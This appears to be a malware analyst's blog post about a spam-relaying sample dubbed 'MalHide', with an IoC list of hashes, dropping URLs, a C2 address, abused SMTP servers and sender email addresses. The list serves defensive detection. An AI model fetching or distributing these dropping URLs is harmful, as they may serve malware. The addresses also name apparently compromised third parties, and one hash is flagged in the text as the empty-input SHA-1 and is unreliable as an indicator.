Here we are: another email has been sent, another malware has been thought up and developed, another analysis I've made, but this time it looks like the "malware economy" is seriously moving to fraud; there is much more money in it than in information stealing, which is an ancient and romantic way to attack victims. Is this attack a significant example of the will of the new underground economy? Is this attack a small and silent paradigm change, where previously the attacker was interested in your data in order to sell it, but now he is more interested in defrauding third parties (such as companies) through you? I do not have the answer here.

OK, now it's time to explain why I called this malware MalHide. Well, it's a complex malware that hides itself several times, BUT most importantly it has been developed to hide the attacker when sending emails, in a way that makes it impossible to trace the attacker's IP back from the attack path. So I believe MalHide is a nice name :D

IoCs:

Samples (SHA-1):

  • 2f1f03b4afde643b2ed798e62f4718b0a285b8a8
  • e6b1a4b09613f1729782f1b2c04a30ad5ff30200
  • da39a3ee5e6b4b0d3255bfef95601890afd80709 (note: this value is the SHA-1 of empty input, so it identifies no file; do not use it as an indicator)
Dropping URLs:
  • http://oddbods.co.uk/D6yd9x/
  • http://136.243.206.64
  • http://166.63.0.27
  • http://promoclass.it/ACCOUNT/Invoice-161021407-Invoice-date-052518-Order-no=-06146166318/
Local Path:
  • C:\Windows\SysWOW64\fonduewwa.exe
  • C:\Users\Public\52887.exe
C2:
  • 67.176.238.209
  • c-67-176-238-209.hsd1.il.comcast.net
SMTP (contacted to send emails; these are not malicious per se!):
  • 186.1.11.125 (smtp.echamorro.com.ni)
  • 192.243.105.21 (mail.mcmillins.com)
  • 209.91.128.17 (mail.maslack.com)
  • 64.8.70.103 (mail.tds.net)
  • 208.80.38.254 (pop.spiderhost.com)
  • 193.252.22.84 (smtp.orange.fr)
  • 199.103.57.167 (mail.mytravelclinic.com)
  • 149.115.16.7 (mail.transamericanengineers.com)
  • 68.99.120.8 (mail.coxmail.com)
  • 74.125.71.108 (smtp.gmail.com)
  • 76.12.209.196 (mail.gachivvis.com)
  • 107.14.166.78 (pop.biz.rr.com)
  • 64.39.128.67 (mail.syrupcity.net)
  • 107.180.3.218 (mail.rutledge-associates.com)
  • 165.212.120.200 (exchange.postoffice.net)
  • 64.35.208.130 (smtp.atcnet.net)
  • 207.204.50.27 (mail.cabstore.biz)
  • 216.52.72.118 (smtp.zoho.com)
  • 209.237.135.167 (mail.astarabatement.com)
  • 107.14.166.72 (smtp.twcny.rr.com)
  • 74.208.5.2 (smtp.1and1.com)
  • 209.123.49.115 (ssl.datamotion.com)
  • 208.92.193.92 (mail.hdap.ca)
  • 68.178.213.37 (smtp.secureserver.net)
  • 72.167.238.29 (smtp.secureserver.net)
  • 66.226.70.67 (pop.doubleolaser.com)
  • 205.178.146.249 (mail.boersmatravel.com)
  • 173.201.192.229 (smtpout.secureserver.net)
  • 64.59.128.135 (mail.shaw.ca)
  • 69.156.240.33 (mail.bestelectric.ca)
  • 38.123.104.66 (smtp.263.net)
  • 184.106.54.11 (smtp.emailsrvr.com)
  • 184.106.54.10 (secure.emailsrvr.com)
  • 209.237.135.166 (webmail5.myregisteredsite.com)
  • 74.125.133.16 (pop.googlemail.com)
  • 68.178.252.229 (smtpout.secureserver.net)
  • 64.20.48.173 (mail.expertforccna.com)
  • 72.47.216.15 (smtp.newalbanyelitedental.com)
  • 66.102.1.109 (pop.gmail.com)
  • 205.207.122.80 (mail.connection.ca)
  • 182.50.145.3 (smtpout.asia.secureserver.net)
  • 74.125.133.109 (imap.gmail.com)
  • 74.6.141.48 (smtp.att.yahoo.com)
  • 193.252.22.86 (smtp.orange.fr)
  • 68.178.252.101 (smtpout.secureserver.net)
  • 69.4.62.69 (pop.kerrcad.org)
  • 69.168.106.36 (smtp.windstream.net)
  • 188.125.73.26 (smtp.mail.yahoo.com)
  • 65.254.254.53 (mail.fatcow.com)
  • 65.254.254.52 (mail.fatcow.com)
  • 69.49.123.241 (mail.salzburginteriors.com)
  • 207.29.219.108 (mail.bayou.com)
  • 198.57.169.26 (bst-hosting.com)
  • 207.223.121.25 (mail.cloudopscenter.com)
  • 207.204.50.18 (mail.reliusmed.com)
  • 208.180.150.85 (mail.lrgriffin.com)
  • 217.15.86.61 (mail.roche-bobois.com)
  • 204.8.72.128 (mail.gdins.org)
  • 66.96.160.206 (pop.seriousfunnyc.org)
  • 66.175.58.40 (mail.mhpwq.org)
  • 207.204.50.11 (mail.prestonequipment.com)
  • 208.89.138.22 (m.ivenue.com)
  • 205.178.146.235 (mail.holstongases.com)
  • 68.15.34.125 (mail.jancompanies.com)
  • 212.82.101.35 (smtp.verizon.net)
  • 192.185.4.163 (gator4151.hostgator.com)
  • 137.118.58.15 (pop.totelcsi.com)
  • 207.69.189.23 (smtp.ix.netcom.com)
  • 68.87.20.6 (smtp.comcast.net)
  • 65.254.250.110 (smtp.franklintonnc.us)
  • 66.118.64.100 (smtp.citynet.net)
  • 173.203.187.10 (pop.emailsrvr.com)
  • 173.15.144.57 (mail.pembertonpolice.com)
  • 173.203.187.14 (mail.sbctransportation.com)
  • 72.52.250.187 (www11.qth.com)
  • 68.178.213.203 (smtp.secureserver.net)
  • 64.78.61.107 (mail16.intermedia.net)
  • 165.212.11.125 (smtp.postoffice.net)
  • 72.35.23.61 (pop.callta.com)
  • 206.188.198.65 (mail.bayoubendtx.com)
  • 65.254.250.100 (pop.powweb.com)
  • 64.29.151.235 (mail.arizoncompanies.com)
Used eMails (sender):
  • helene.valeze@wanadoo.fr
  • mehdi.audam@wanadoo.fr
  • dominique.derbord@wanadoo.fr